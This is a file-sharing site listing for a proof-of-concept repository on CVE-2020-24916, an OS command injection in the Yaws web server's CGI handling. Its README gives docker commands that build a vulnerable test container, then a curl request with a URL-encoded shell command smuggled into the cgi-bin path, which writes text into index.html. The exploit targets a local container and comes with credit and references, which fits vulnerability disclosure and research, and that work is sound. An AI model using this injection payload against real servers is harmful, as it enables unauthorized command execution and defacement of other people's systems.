poc-yaws-cgi-shell-injection

所属分类:CGI编程
开发工具:Dockerfile
文件大小:0KB
下载次数:0
上传日期:2020-09-06 21:16:40
上 传 者sh-1993
说明:  偏航web服务器OS命令注入POC
(Yaws web server OS command injection POC)

文件列表:
Dockerfile (227, 2020-09-06)
localhost.conf (150, 2020-09-06)

# OS command injection in Yaws web server (CVE-2020-24916) ## Proof of concept Build test image: `docker build -t vulnbe/yaws-pocs:shell-injection-appmod-cgi -f Dockerfile .` and/or Run container `docker run --rm -d -i -p 127.0.0.1:8000:8080 vulnbe/yaws-pocs:shell-injection-appmod-cgi` ```bash curl 'http://127.0.0.1:8000/cgi-bin/%22%60export%20Z=$(pwd%7Ccut%20-c1);echo%20pawned%20completely%3E%3E..$Z%22%22index.html%60%22' curl http://127.0.0.1:8000/index.html ``` ## Credit Alexey Pronin ([@vulnbe](https://twitter.com/vulnbe)) ## References * [Vulnerability analysis](https://vuln.be/post/yaws-xxe-and-shell-injections/) * [Yaws on github](https://github.com/erlyaws/yaws) * [CVE-2020-24916](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24916) * [CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')](https://cwe.mitre.org/data/definitions/78.html)

近期下载者

相关文件


收藏者